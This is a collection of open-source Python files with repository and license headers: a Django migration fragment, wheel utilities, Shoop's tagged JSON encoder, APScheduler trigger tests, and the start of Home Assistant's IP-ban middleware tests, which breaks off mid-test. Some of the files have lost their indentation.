            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'through': "orm['useradmin.GroupPermission']", 'symmetrical': 'False'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
        },
        'useradmin.ldapgroup': {
            'Meta': {'object_name': 'LdapGroup'},
            'group': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'group'", 'to': "orm['auth.Group']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
        },
        'useradmin.userprofile': {
            'Meta': {'object_name': 'UserProfile'},
            'creation_method': ('django.db.models.fields.CharField', [], {'default': "'HUE'", 'max_length': '64'}),
            'home_directory': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'unique': 'True'})
        }
    }

    complete_apps = ['useradmin']
    symmetrical = True
| apache-2.0 |
SantosDevelopers/sborganicos | venv/lib/python3.5/site-packages/wheel/util.py | 345 | 4890 | """Utility functions."""
import sys
import os
import base64
import json
import hashlib
try:
from collections import OrderedDict
except ImportError:
OrderedDict = dict
__all__ = ['urlsafe_b64encode', 'urlsafe_b64decode', 'utf8',
'to_json', 'from_json', 'matches_requirement']
def urlsafe_b64encode(data):
    """urlsafe_b64encode without padding"""
    encoded = base64.urlsafe_b64encode(data)
    return encoded.rstrip(b'=')
def urlsafe_b64decode(data):
    """urlsafe_b64decode without padding"""
    # Restore enough '=' characters to reach a multiple of four.
    padding = b'=' * (4 - (len(data) & 3))
    return base64.urlsafe_b64decode(data + padding)
def to_json(o):
    """Serialize *o* to a JSON string with deterministically sorted keys."""
    return json.dumps(o, sort_keys=True)
def from_json(j):
    """Parse a JSON string back into Python objects."""
    return json.loads(j)
def open_for_csv(name, mode):
    """Open *name* for csv use with version-appropriate newline handling:
    binary mode on Python 2, newline='' text mode on Python 3."""
    if sys.version_info[0] < 3:
        kwargs = {}
        mode_suffix = 'b'
    else:
        kwargs = {'newline': ''}
        mode_suffix = ''
    return open(name, mode + mode_suffix, **kwargs)
try:
    unicode
except NameError:
    # Python 3: only str values need encoding; bytes pass through untouched.
    def utf8(data):
        '''Utf-8 encode data.'''
        return data.encode('utf-8') if isinstance(data, str) else data
else:
    # Python 2: encode unicode objects; byte strings pass through untouched.
    def utf8(data):
        '''Utf-8 encode data.'''
        return data.encode('utf-8') if isinstance(data, unicode) else data
try:
    # For encoding ascii back and forth between bytestrings, as is repeatedly
    # necessary in JSON-based crypto under Python 3
    unicode

    def native(s):
        """Return *s* as the native str type (no-op on Python 2)."""
        return s

    def binary(s):
        """Return *s* as bytes, ASCII-encoding unicode input."""
        if isinstance(s, unicode):
            return s.encode('ascii')
        return s
except NameError:
    def native(s):
        """Return *s* as the native str type, ASCII-decoding bytes input."""
        if isinstance(s, bytes):
            return s.decode('ascii')
        return s

    def binary(s):
        """Return *s* as bytes, ASCII-encoding str input.

        Fix: previously fell off the end and returned None for input that
        was already bytes (the Python 2 branch returns it unchanged).
        """
        if isinstance(s, str):
            return s.encode('ascii')
        return s
class HashingFile(object):
    """File-like wrapper that hashes and counts every byte written through it."""

    def __init__(self, fd, hashtype='sha256'):
        self.fd = fd
        self.hashtype = hashtype
        self.hash = hashlib.new(hashtype)
        self.length = 0

    def write(self, data):
        """Fold *data* into the running hash and length, then forward it."""
        self.hash.update(data)
        self.length += len(data)
        self.fd.write(data)

    def close(self):
        self.fd.close()

    def digest(self):
        """Return the digest string: bare hex for md5, RECORD-style
        "<hashtype>=<urlsafe-b64>" otherwise."""
        if self.hashtype == 'md5':
            return self.hash.hexdigest()
        raw = self.hash.digest()
        return '%s=%s' % (self.hashtype, native(urlsafe_b64encode(raw)))
class OrderedDefaultDict(OrderedDict):
    """OrderedDict with defaultdict-style factory for missing keys.

    The optional first positional argument is the factory; remaining
    arguments are passed through to OrderedDict.
    """

    def __init__(self, *args, **kwargs):
        factory = None
        if args:
            factory = args[0]
            if factory is not None and not callable(factory):
                raise TypeError('first argument must be callable or None')
            args = args[1:]
        self.default_factory = factory
        super(OrderedDefaultDict, self).__init__(*args, **kwargs)

    def __missing__(self, key):
        # Without a factory, behave like a plain dict lookup failure.
        if self.default_factory is None:
            raise KeyError(key)
        value = self[key] = self.default_factory()
        return value
if sys.platform == 'win32':
    import ctypes.wintypes
    # CSIDL_APPDATA for reference - not used here for compatibility with
    # dirspec, which uses LOCAL_APPDATA and COMMON_APPDATA in that order
    csidl = dict(CSIDL_APPDATA=26, CSIDL_LOCAL_APPDATA=28,
                 CSIDL_COMMON_APPDATA=35)

    def get_path(name):
        """Return the Windows special folder path for the named CSIDL."""
        SHGFP_TYPE_CURRENT = 0
        buf = ctypes.create_unicode_buffer(ctypes.wintypes.MAX_PATH)
        ctypes.windll.shell32.SHGetFolderPathW(0, csidl[name], 0, SHGFP_TYPE_CURRENT, buf)
        return buf.value

    def save_config_path(*resource):
        """Return (creating if needed) a writable config dir under local appdata."""
        appdata = get_path("CSIDL_LOCAL_APPDATA")
        path = os.path.join(appdata, *resource)
        if not os.path.isdir(path):
            os.makedirs(path)
        return path

    def load_config_paths(*resource):
        """Yield existing config dirs, local appdata before common appdata."""
        ids = ["CSIDL_LOCAL_APPDATA", "CSIDL_COMMON_APPDATA"]
        for id in ids:
            base = get_path(id)
            path = os.path.join(base, *resource)
            if os.path.exists(path):
                yield path
else:
    # Non-Windows: delegate to the XDG base-directory spec implementation.
    # The import is deferred so the xdg package is only required when called.
    def save_config_path(*resource):
        """Return (creating if needed) a writable XDG config directory."""
        import xdg.BaseDirectory
        return xdg.BaseDirectory.save_config_path(*resource)

    def load_config_paths(*resource):
        """Yield existing XDG config directories, most specific first."""
        import xdg.BaseDirectory
        return xdg.BaseDirectory.load_config_paths(*resource)
def matches_requirement(req, wheels):
    """List of wheels matching a requirement.

    :param req: The requirement to satisfy
    :param wheels: List of wheels to search.
    """
    try:
        from pkg_resources import Distribution, Requirement
    except ImportError:
        raise RuntimeError("Cannot use requirements without pkg_resources")

    requirement = Requirement.parse(req)
    matched = []
    for candidate in wheels:
        parsed = candidate.parsed_filename
        dist = Distribution(project_name=parsed.group("name"),
                            version=parsed.group("ver"))
        if dist in requirement:
            matched.append(candidate)
    return matched
| mit |
jacobsenanaizabel/shoop | shoop/core/fields/tagged_json.py | 6 | 3235 | # This file is part of Shoop.
#
# Copyright (c) 2012-2015, Shoop Ltd. All rights reserved.
#
# This source code is licensed under the AGPLv3 license found in the
# LICENSE file in the root directory of this source tree.
"""
"Tagged JSON" encoder/decoder.
Objects that are normally not unambiguously representable via JSON
are encoded into special objects of the form `{tag: val}`; the encoding
and decoding process can be customized however necessary.
"""
from __future__ import unicode_literals
import datetime
import decimal
from enum import Enum
import django.utils.dateparse as dateparse
from django.core.exceptions import ImproperlyConfigured
from django.utils import six
from jsonfield.encoder import JSONEncoder
from six import text_type
from shoop.utils.importing import load
from shoop.utils.iterables import first
def isoformat(obj):
    """Return the ISO 8601 string for a date/datetime/time object.

    Replaces the previous ``isoformat = lambda obj: ...`` assignment
    (PEP 8 discourages binding lambdas to names).
    """
    return obj.isoformat()
def encode_enum(enum_val):
    """Encode an Enum member as ``[import-spec, value]``.

    Falls back to the bare value when the enum class cannot be re-imported
    from its module:name spec (so decoding would be impossible anyway).
    """
    enum_cls = type(enum_val)
    spec = "%s:%s" % (enum_cls.__module__, enum_cls.__name__)
    try:
        if load(spec) != enum_cls:
            raise ImproperlyConfigured("That's not the same class!")
    except ImproperlyConfigured:  # Also raised by `load`
        return enum_val.value  # Fall back to the bare value.
    return [spec, enum_val.value]
def decode_enum(val):
    """Decode a ``[spec, value]`` pair produced by encode_enum.

    Returns the bare value when the spec no longer resolves to an Enum
    subclass (best-effort fallback).
    """
    spec, value = val
    cls = load(spec)
    return cls(value) if issubclass(cls, Enum) else value
class TagRegistry(object):
    """Registry mapping JSON tags to the classes they encode and the
    encoder/decoder callables used for the round trip."""

    def __init__(self):
        self.tags = {}

    def register(self, tag, classes, encoder=text_type, decoder=None):
        """Register *classes* under *tag*; the decoder defaults to the
        (first) registered class itself."""
        if decoder is None:
            decoder = classes[0] if isinstance(classes, (list, tuple)) else classes
        if not callable(decoder):
            raise ValueError("Decoder %r for tag %r is not callable" % (decoder, tag))
        if not callable(encoder):
            raise ValueError("Encoder %r for tag %r is not callable" % (encoder, tag))
        self.tags[tag] = {
            "classes": classes,
            "encoder": encoder,
            "decoder": decoder,
        }

    def encode(self, obj, default):
        """Encode *obj* as a {tag: encoded} object, or defer to *default*."""
        for tag, info in six.iteritems(self.tags):
            if isinstance(obj, info["classes"]):
                return {tag: info["encoder"](obj)}
        return default(obj)

    def decode(self, obj):
        """Decode a single-key {tag: value} object; pass others through."""
        if len(obj) != 1:
            return obj
        tag, val = first(obj.items())
        info = self.tags.get(tag)
        return info["decoder"](val) if info else obj
#: The default tag registry.
tag_registry = TagRegistry()
# Built-in tags: temporal types serialize via isoformat() and parse back with
# django.utils.dateparse; Decimal stringifies (its decoder is Decimal itself);
# Enum members round-trip through encode_enum/decode_enum.
tag_registry.register("$datetime", datetime.datetime, encoder=isoformat, decoder=dateparse.parse_datetime)
tag_registry.register("$date", datetime.date, encoder=isoformat, decoder=dateparse.parse_date)
tag_registry.register("$time", datetime.time, encoder=isoformat, decoder=dateparse.parse_time)
tag_registry.register("$dec", decimal.Decimal)
tag_registry.register("$enum", Enum, encoder=encode_enum, decoder=decode_enum)
class TaggedJSONEncoder(JSONEncoder):
    """JSON encoder that consults the tag registry before the base encoder."""
    # Registry used to encode otherwise-unserializable objects.
    registry = tag_registry

    def default(self, obj):
        # NOTE(review): super(JSONEncoder, self) deliberately skips
        # JSONEncoder's own `default` in the MRO, so unregistered types fall
        # through to the grandparent encoder instead -- confirm intended.
        return self.registry.encode(obj, super(JSONEncoder, self).default)
| agpl-3.0 |
noushi/apscheduler | tests/test_triggers.py | 1 | 15693 | from datetime import datetime, timedelta
import pytest
import pytz
from apscheduler.triggers.cron import CronTrigger
from apscheduler.triggers.date import DateTrigger
from apscheduler.triggers.interval import IntervalTrigger
class TestCronTrigger(object):
def test_cron_trigger_1(self, timezone):
    """Stepped year/month with a day range: repr/str and first fire time."""
    trigger = CronTrigger(year='2009/2', month='1/3', day='5-13', timezone=timezone)
    assert repr(trigger) == "<CronTrigger (year='2009/2', month='1/3', day='5-13')>"
    assert str(trigger) == "cron[year='2009/2', month='1/3', day='5-13']"
    start = timezone.localize(datetime(2008, 12, 1))
    expected = timezone.localize(datetime(2009, 1, 5))
    assert trigger.get_next_fire_time(None, start) == expected
def test_cron_trigger_2(self, timezone):
    """Starting past the day range rolls over to the next matching year."""
    trigger = CronTrigger(year='2009/2', month='1/3', day='5-13', timezone=timezone)
    start = timezone.localize(datetime(2009, 10, 14))
    expected = timezone.localize(datetime(2011, 1, 5))
    assert trigger.get_next_fire_time(None, start) == expected
def test_cron_trigger_3(self, timezone):
    """An hour range resolves to the first hour of the first matching day."""
    trigger = CronTrigger(year='2009', month='2', hour='8-10', timezone=timezone)
    assert repr(trigger) == "<CronTrigger (year='2009', month='2', hour='8-10')>"
    start = timezone.localize(datetime(2009, 1, 1))
    expected = timezone.localize(datetime(2009, 2, 1, 8))
    assert trigger.get_next_fire_time(None, start) == expected
def test_cron_trigger_4(self, timezone):
trigger = CronTrigger(year='2012', month='2', day='last', timezone=timezone)
assert repr(trigger) == "<CronTrigger (year='2012', month='2', day='last')>"
start_date = timezone.localize(datetime(2012, 2, 1))
correct_next_date = timezone.localize(datetime(2012, 2, 29))
assert trigger.get_next_fire_time(None, start_date) == correct_next_date
def test_cron_zero_value(self, timezone):
trigger = CronTrigger(year=2009, month=2, hour=0, timezone=timezone)
assert repr(trigger) == "<CronTrigger (year='2009', month='2', hour='0')>"
def test_cron_year_list(self, timezone):
trigger = CronTrigger(year='2009,2008', timezone=timezone)
assert repr(trigger) == "<CronTrigger (year='2009,2008')>"
assert str(trigger) == "cron[year='2009,2008']"
start_date = timezone.localize(datetime(2009, 1, 1))
correct_next_date = timezone.localize(datetime(2009, 1, 1))
assert trigger.get_next_fire_time(None, start_date) == correct_next_date
def test_cron_start_date(self, timezone):
trigger = CronTrigger(year='2009', month='2', hour='8-10', start_date='2009-02-03 11:00:00', timezone=timezone)
assert repr(trigger) == \
"<CronTrigger (year='2009', month='2', hour='8-10', start_date='2009-02-03 11:00:00 CET')>"
assert str(trigger) == "cron[year='2009', month='2', hour='8-10']"
start_date = timezone.localize(datetime(2009, 1, 1))
correct_next_date = timezone.localize(datetime(2009, 2, 4, 8))
assert trigger.get_next_fire_time(None, start_date) == correct_next_date
def test_cron_weekday_overlap(self, timezone):
trigger = CronTrigger(year=2009, month=1, day='6-10', day_of_week='2-4', timezone=timezone)
assert repr(trigger) == "<CronTrigger (year='2009', month='1', day='6-10', day_of_week='2-4')>"
assert str(trigger) == "cron[year='2009', month='1', day='6-10', day_of_week='2-4']"
start_date = timezone.localize(datetime(2009, 1, 1))
correct_next_date = timezone.localize(datetime(2009, 1, 7))
assert trigger.get_next_fire_time(None, start_date) == correct_next_date
def test_cron_weekday_nomatch(self, timezone):
trigger = CronTrigger(year=2009, month=1, day='6-10', day_of_week='0,6', timezone=timezone)
assert repr(trigger) == "<CronTrigger (year='2009', month='1', day='6-10', day_of_week='0,6')>"
assert str(trigger) == "cron[year='2009', month='1', day='6-10', day_of_week='0,6']"
start_date = timezone.localize(datetime(2009, 1, 1))
correct_next_date = None
assert trigger.get_next_fire_time(None, start_date) == correct_next_date
def test_cron_weekday_positional(self, timezone):
trigger = CronTrigger(year=2009, month=1, day='4th wed', timezone=timezone)
assert repr(trigger) == "<CronTrigger (year='2009', month='1', day='4th wed')>"
assert str(trigger) == "cron[year='2009', month='1', day='4th wed']"
start_date = timezone.localize(datetime(2009, 1, 1))
correct_next_date = timezone.localize(datetime(2009, 1, 28))
assert trigger.get_next_fire_time(None, start_date) == correct_next_date
def test_week_1(self, timezone):
trigger = CronTrigger(year=2009, month=2, week=8, timezone=timezone)
assert repr(trigger) == "<CronTrigger (year='2009', month='2', week='8')>"
assert str(trigger) == "cron[year='2009', month='2', week='8']"
start_date = timezone.localize(datetime(2009, 1, 1))
correct_next_date = timezone.localize(datetime(2009, 2, 16))
assert trigger.get_next_fire_time(None, start_date) == correct_next_date
def test_week_2(self, timezone):
trigger = CronTrigger(year=2009, week=15, day_of_week=2, timezone=timezone)
assert repr(trigger) == "<CronTrigger (year='2009', week='15', day_of_week='2')>"
assert str(trigger) == "cron[year='2009', week='15', day_of_week='2']"
start_date = timezone.localize(datetime(2009, 1, 1))
correct_next_date = timezone.localize(datetime(2009, 4, 8))
assert trigger.get_next_fire_time(None, start_date) == correct_next_date
def test_cron_extra_coverage(self, timezone):
# This test has no value other than patching holes in test coverage
trigger = CronTrigger(day='6,8', timezone=timezone)
assert repr(trigger) == "<CronTrigger (day='6,8')>"
assert str(trigger) == "cron[day='6,8']"
start_date = timezone.localize(datetime(2009, 12, 31))
correct_next_date = timezone.localize(datetime(2010, 1, 6))
assert trigger.get_next_fire_time(None, start_date) == correct_next_date
def test_cron_faulty_expr(self, timezone):
pytest.raises(ValueError, CronTrigger, year='2009-fault', timezone=timezone)
def test_cron_increment_weekday(self, timezone):
"""
Tests that incrementing the weekday field in the process of calculating the next matching date won't cause
problems.
"""
trigger = CronTrigger(hour='5-6', timezone=timezone)
assert repr(trigger) == "<CronTrigger (hour='5-6')>"
assert str(trigger) == "cron[hour='5-6']"
start_date = timezone.localize(datetime(2009, 9, 25, 7))
correct_next_date = timezone.localize(datetime(2009, 9, 26, 5))
assert trigger.get_next_fire_time(None, start_date) == correct_next_date
def test_cron_bad_kwarg(self, timezone):
pytest.raises(TypeError, CronTrigger, second=0, third=1, timezone=timezone)
def test_timezone_from_start_date(self, timezone):
"""Tests that the trigger takes the timezone from the start_date parameter if no timezone is supplied."""
start_date = timezone.localize(datetime(2014, 4, 13, 5, 30))
trigger = CronTrigger(year=2014, hour=4, start_date=start_date)
assert trigger.timezone == start_date.tzinfo
def test_end_date(self, timezone):
end_date = timezone.localize(datetime(2014, 4, 13, 3))
trigger = CronTrigger(year=2014, hour=4, end_date=end_date)
start_date = timezone.localize(datetime(2014, 4, 13, 2, 30))
assert trigger.get_next_fire_time(None, start_date - timedelta(1)) == \
start_date.replace(day=12, hour=4, minute=0)
assert trigger.get_next_fire_time(None, start_date) is None
def test_different_tz(self, timezone):
alter_tz = pytz.FixedOffset(-600)
trigger = CronTrigger(year=2009, week=15, day_of_week=2, timezone=timezone)
assert repr(trigger) == "<CronTrigger (year='2009', week='15', day_of_week='2')>"
assert str(trigger) == "cron[year='2009', week='15', day_of_week='2']"
start_date = alter_tz.localize(datetime(2008, 12, 31, 22))
correct_next_date = timezone.localize(datetime(2009, 4, 8))
assert trigger.get_next_fire_time(None, start_date) == correct_next_date
def test_dst_change(self):
"""
Making sure that CronTrigger works correctly when crossing the DST switch threshold.
Note that you should explicitly compare datetimes as strings to avoid the internal datetime comparison which
would test for equality in the UTC timezone.
"""
eastern = pytz.timezone('US/Eastern')
trigger = CronTrigger(minute='*/30', timezone=eastern)
datetime_edt = eastern.localize(datetime(2013, 11, 3, 1, 5), is_dst=True)
correct_next_date = eastern.localize(datetime(2013, 11, 3, 1, 30), is_dst=True)
assert str(trigger.get_next_fire_time(None, datetime_edt)) == str(correct_next_date)
datetime_edt = eastern.localize(datetime(2013, 11, 3, 1, 35), is_dst=True)
correct_next_date = eastern.localize(datetime(2013, 11, 3, 1), is_dst=False)
assert str(trigger.get_next_fire_time(None, datetime_edt)) == str(correct_next_date)
def test_timezone_change(self, timezone):
"""
Ensure that get_next_fire_time method returns datetimes in the timezone of the trigger and not in the timezone
of the passed in start_date.
"""
est = pytz.FixedOffset(-300)
cst = pytz.FixedOffset(-360)
trigger = CronTrigger(hour=11, minute='*/5', timezone=est)
start_date = cst.localize(datetime(2009, 9, 26, 10, 16))
correct_next_date = est.localize(datetime(2009, 9, 26, 11, 20))
assert str(trigger.get_next_fire_time(None, start_date)) == str(correct_next_date)
class TestDateTrigger(object):
    """Tests for DateTrigger: one-shot firing, text run dates, already-fired
    suppression, alternate timezones and the ambiguous DST fall-back hour."""

    @pytest.mark.parametrize('run_date,alter_tz,previous,now,expected', [
        (datetime(2009, 7, 6), None, None, datetime(2008, 5, 4), datetime(2009, 7, 6)),
        (datetime(2009, 7, 6), None, None, datetime(2009, 7, 6), datetime(2009, 7, 6)),
        (datetime(2009, 7, 6), None, None, datetime(2009, 9, 2), datetime(2009, 7, 6)),
        ('2009-7-6', None, None, datetime(2009, 9, 2), datetime(2009, 7, 6)),
        (datetime(2009, 7, 6), None, datetime(2009, 7, 6), datetime(2009, 9, 2), None),
        (datetime(2009, 7, 5, 22), pytz.FixedOffset(-60), datetime(2009, 7, 6), datetime(2009, 7, 6), None)
    ], ids=['earlier', 'exact', 'later', 'as text', 'previously fired', 'alternate timezone'])
    def test_get_next_fire_time(self, run_date, alter_tz, previous, now, expected, timezone):
        # A date trigger fires exactly once; 'previous' being set means it
        # already fired, so no further fire time is expected.
        trigger = DateTrigger(run_date, alter_tz or timezone)
        previous = timezone.localize(previous) if previous else None
        now = timezone.localize(now)
        expected = timezone.localize(expected) if expected else None
        assert trigger.get_next_fire_time(previous, now) == expected

    @pytest.mark.parametrize('is_dst', [True, False], ids=['daylight saving', 'standard time'])
    def test_dst_change(self, is_dst):
        """
        Making sure that DateTrigger works during the ambiguous "fall-back" DST period.
        Note that you should explicitly compare datetimes as strings to avoid the internal datetime comparison which
        would test for equality in the UTC timezone.
        """
        eastern = pytz.timezone('US/Eastern')
        run_date = eastern.localize(datetime(2013, 11, 3, 1, 5), is_dst=is_dst)
        fire_date = eastern.normalize(run_date + timedelta(minutes=55))
        trigger = DateTrigger(run_date=fire_date, timezone=eastern)
        assert str(trigger.get_next_fire_time(None, fire_date)) == str(fire_date)

    def test_repr(self, timezone):
        trigger = DateTrigger(datetime(2009, 7, 6), timezone)
        assert repr(trigger) == "<DateTrigger (run_date='2009-07-06 00:00:00 CEST')>"

    def test_str(self, timezone):
        trigger = DateTrigger(datetime(2009, 7, 6), timezone)
        assert str(trigger) == "date[2009-07-06 00:00:00 CEST]"
class TestIntervalTrigger(object):
    """Tests for IntervalTrigger: interval stepping, start/end date handling,
    alternate timezones and the DST fall-back hour."""

    @pytest.fixture()
    def trigger(self, timezone):
        # Common 1-second trigger starting at 2009-08-04 00:00:02.
        return IntervalTrigger(seconds=1, start_date=datetime(2009, 8, 4, second=2), timezone=timezone)

    def test_invalid_interval(self, timezone):
        # A non-numeric interval argument must raise TypeError.
        pytest.raises(TypeError, IntervalTrigger, '1-6', timezone=timezone)

    def test_before(self, trigger, timezone):
        """Tests that if "start_date" is later than "now", it will return start_date."""
        now = trigger.start_date - timedelta(seconds=2)
        assert trigger.get_next_fire_time(None, now) == trigger.start_date

    def test_within(self, trigger, timezone):
        """Tests that if "now" is between "start_date" and the next interval, it will return the next interval."""
        now = trigger.start_date + timedelta(microseconds=1000)
        assert trigger.get_next_fire_time(None, now) == trigger.start_date + trigger.interval

    def test_no_start_date(self, timezone):
        # Without a start_date the first fire time is at most one interval away.
        trigger = IntervalTrigger(seconds=2, timezone=timezone)
        now = datetime.now(timezone)
        assert (trigger.get_next_fire_time(None, now) - now) <= timedelta(seconds=2)

    def test_different_tz(self, trigger, timezone):
        # 'now' expressed in another timezone still yields the right fire time.
        alter_tz = pytz.FixedOffset(-60)
        start_date = alter_tz.localize(datetime(2009, 8, 3, 22, second=2, microsecond=1000))
        correct_next_date = timezone.localize(datetime(2009, 8, 4, 1, second=3))
        assert trigger.get_next_fire_time(None, start_date) == correct_next_date

    def test_end_date(self, timezone):
        """Tests that the interval trigger won't return any datetimes past the set end time."""
        start_date = timezone.localize(datetime(2014, 5, 26))
        trigger = IntervalTrigger(minutes=5, start_date=start_date, end_date=datetime(2014, 5, 26, 0, 7),
                                  timezone=timezone)
        assert trigger.get_next_fire_time(None, start_date + timedelta(minutes=2)) == start_date.replace(minute=5)
        assert trigger.get_next_fire_time(None, start_date + timedelta(minutes=6)) is None

    def test_dst_change(self):
        """
        Making sure that IntervalTrigger works during the ambiguous "fall-back" DST period.
        Note that you should explicitly compare datetimes as strings to avoid the internal datetime comparison which
        would test for equality in the UTC timezone.
        """
        eastern = pytz.timezone('US/Eastern')
        start_date = datetime(2013, 6, 1)  # Start within EDT
        trigger = IntervalTrigger(hours=1, start_date=start_date, timezone=eastern)

        datetime_edt = eastern.localize(datetime(2013, 11, 3, 1, 5), is_dst=True)
        correct_next_date = eastern.normalize(datetime_edt + timedelta(minutes=55))
        assert str(trigger.get_next_fire_time(None, datetime_edt)) == str(correct_next_date)

        datetime_est = eastern.localize(datetime(2013, 11, 3, 1, 5), is_dst=False)
        correct_next_date = eastern.normalize(datetime_est + timedelta(minutes=55))
        assert str(trigger.get_next_fire_time(None, datetime_est)) == str(correct_next_date)

    def test_repr(self, trigger):
        assert repr(trigger) == \
            "<IntervalTrigger (interval=datetime.timedelta(0, 1), start_date='2009-08-04 00:00:02 CEST')>"

    def test_str(self, trigger):
        assert str(trigger) == "interval[0:00:01]"
| mit |
w1ll1am23/home-assistant | tests/components/http/test_ban.py | 8 | 7531 | """The tests for the Home Assistant HTTP component."""
# pylint: disable=protected-access
from ipaddress import ip_address
import os
from unittest.mock import Mock, mock_open, patch
from aiohttp import web
from aiohttp.web_exceptions import HTTPUnauthorized
from aiohttp.web_middlewares import middleware
import pytest
import homeassistant.components.http as http
from homeassistant.components.http import KEY_AUTHENTICATED
from homeassistant.components.http.ban import (
IP_BANS_FILE,
KEY_BANNED_IPS,
KEY_FAILED_LOGIN_ATTEMPTS,
IpBan,
setup_bans,
)
from homeassistant.components.http.view import request_handler_factory
from homeassistant.const import HTTP_FORBIDDEN
from homeassistant.setup import async_setup_component
from . import mock_real_ip
from tests.common import async_mock_service
# Fixed addresses used by the ban tests below.
SUPERVISOR_IP = "1.2.3.4"  # pretend supervisor address for the supervisor-exemption test
BANNED_IPS = ["200.201.202.203", "100.64.0.2"]
BANNED_IPS_WITH_SUPERVISOR = BANNED_IPS + [SUPERVISOR_IP]
@pytest.fixture(name="hassio_env")
def hassio_env_fixture():
    """Fixture to inject hassio env.

    Sets the HASSIO/HASSIO_TOKEN environment variables and stubs the
    supervisor connectivity check so the hassio integration can be set up.
    """
    with patch.dict(os.environ, {"HASSIO": "127.0.0.1"}), patch(
        "homeassistant.components.hassio.HassIO.is_connected",
        return_value={"result": "ok", "data": {}},
    ), patch.dict(os.environ, {"HASSIO_TOKEN": "123456"}):
        yield
@pytest.fixture(autouse=True)
def gethostbyaddr_mock():
    """Fixture to mock out I/O on getting host by address.

    Autouse: every test in this module resolves any IP to "example.com"
    without touching DNS.
    """
    with patch(
        "homeassistant.components.http.ban.gethostbyaddr",
        return_value=("example.com", ["0.0.0.0.in-addr.arpa"], ["0.0.0.0"]),
    ):
        yield
async def test_access_from_banned_ip(hass, aiohttp_client):
    """Test accessing to server from banned IP. Both trusted and not."""
    app = web.Application()
    app["hass"] = hass
    setup_bans(hass, app, 5)
    set_real_ip = mock_real_ip(app)

    # Pre-load the ban list instead of reading it from disk.
    with patch(
        "homeassistant.components.http.ban.async_load_ip_bans_config",
        return_value=[IpBan(banned_ip) for banned_ip in BANNED_IPS],
    ):
        client = await aiohttp_client(app)

    # Every banned address must be rejected outright.
    for remote_addr in BANNED_IPS:
        set_real_ip(remote_addr)
        resp = await client.get("/")
        assert resp.status == HTTP_FORBIDDEN
# Each case: (requesting address, expected ban count, expected status of the
# second request).  The supervisor IP must never be banned (0 bans, plain 401).
@pytest.mark.parametrize(
    "remote_addr, bans, status",
    list(
        zip(
            BANNED_IPS_WITH_SUPERVISOR, [1, 1, 0], [HTTP_FORBIDDEN, HTTP_FORBIDDEN, 401]
        )
    ),
)
async def test_access_from_supervisor_ip(
    remote_addr, bans, status, hass, aiohttp_client, hassio_env
):
    """Test accessing to server from supervisor IP."""
    app = web.Application()
    app["hass"] = hass

    async def unauth_handler(request):
        """Return a mock web response."""
        raise HTTPUnauthorized

    app.router.add_get("/", unauth_handler)
    setup_bans(hass, app, 1)
    mock_real_ip(app)(remote_addr)

    with patch(
        "homeassistant.components.http.ban.async_load_ip_bans_config", return_value=[]
    ):
        client = await aiohttp_client(app)

    assert await async_setup_component(hass, "hassio", {"hassio": {}})

    m_open = mock_open()

    # Mark remote_addr's supervisor status via the SUPERVISOR env var and stub
    # the ban-file write so no disk I/O happens.
    with patch.dict(os.environ, {"SUPERVISOR": SUPERVISOR_IP}), patch(
        "homeassistant.components.http.ban.open", m_open, create=True
    ):
        resp = await client.get("/")
        assert resp.status == 401
        assert len(app[KEY_BANNED_IPS]) == bans
        assert m_open.call_count == bans

        # second request should be forbidden if banned
        resp = await client.get("/")
        assert resp.status == status
        assert len(app[KEY_BANNED_IPS]) == bans
async def test_ban_middleware_not_loaded_by_config(hass):
    """Test that the ban middleware is not set up when disabled in config."""
    with patch("homeassistant.components.http.setup_bans") as mock_setup:
        await async_setup_component(
            hass, "http", {"http": {http.CONF_IP_BAN_ENABLED: False}}
        )

    assert len(mock_setup.mock_calls) == 0
async def test_ban_middleware_loaded_by_default(hass):
    """Test that the ban middleware is set up when no config option is given."""
    with patch("homeassistant.components.http.setup_bans") as mock_setup:
        await async_setup_component(hass, "http", {"http": {}})

    assert len(mock_setup.mock_calls) == 1
async def test_ip_bans_file_creation(hass, aiohttp_client):
    """Testing if banned IP file created.

    After the configured number of failed logins (2) the offending IP is
    appended to the ban file and a persistent notification is created.
    """
    notification_calls = async_mock_service(hass, "persistent_notification", "create")

    app = web.Application()
    app["hass"] = hass

    async def unauth_handler(request):
        """Return a mock web response."""
        raise HTTPUnauthorized

    app.router.add_get("/", unauth_handler)
    setup_bans(hass, app, 2)
    mock_real_ip(app)("200.201.202.204")

    with patch(
        "homeassistant.components.http.ban.async_load_ip_bans_config",
        return_value=[IpBan(banned_ip) for banned_ip in BANNED_IPS],
    ):
        client = await aiohttp_client(app)

    m_open = mock_open()

    with patch("homeassistant.components.http.ban.open", m_open, create=True):
        # First failure: below the threshold, no file write yet.
        resp = await client.get("/")
        assert resp.status == 401
        assert len(app[KEY_BANNED_IPS]) == len(BANNED_IPS)
        assert m_open.call_count == 0

        # Second failure: threshold reached, ban recorded and appended to file.
        resp = await client.get("/")
        assert resp.status == 401
        assert len(app[KEY_BANNED_IPS]) == len(BANNED_IPS) + 1
        m_open.assert_called_once_with(hass.config.path(IP_BANS_FILE), "a")

        # Now banned: request is rejected without another file write.
        resp = await client.get("/")
        assert resp.status == HTTP_FORBIDDEN
        assert m_open.call_count == 1

        assert len(notification_calls) == 3
        assert (
            notification_calls[0].data["message"]
            == "Login attempt or request with invalid authentication from example.com (200.201.202.204). See the log for details."
        )
async def test_failed_login_attempts_counter(hass, aiohttp_client):
    """Testing if failed login attempts counter increased.

    Unauthenticated hits on auth-required views increment the per-IP counter;
    authenticated or auth-free hits leave it unchanged.
    """
    app = web.Application()
    app["hass"] = hass

    async def auth_handler(request):
        """Return 200 status code."""
        return None, 200

    app.router.add_get(
        "/auth_true", request_handler_factory(Mock(requires_auth=True), auth_handler)
    )
    app.router.add_get(
        "/auth_false", request_handler_factory(Mock(requires_auth=True), auth_handler)
    )
    app.router.add_get(
        "/", request_handler_factory(Mock(requires_auth=False), auth_handler)
    )

    setup_bans(hass, app, 5)
    remote_ip = ip_address("200.201.202.204")
    mock_real_ip(app)("200.201.202.204")

    @middleware
    async def mock_auth(request, handler):
        """Mock auth middleware."""
        # Only the /auth_true path counts as authenticated.
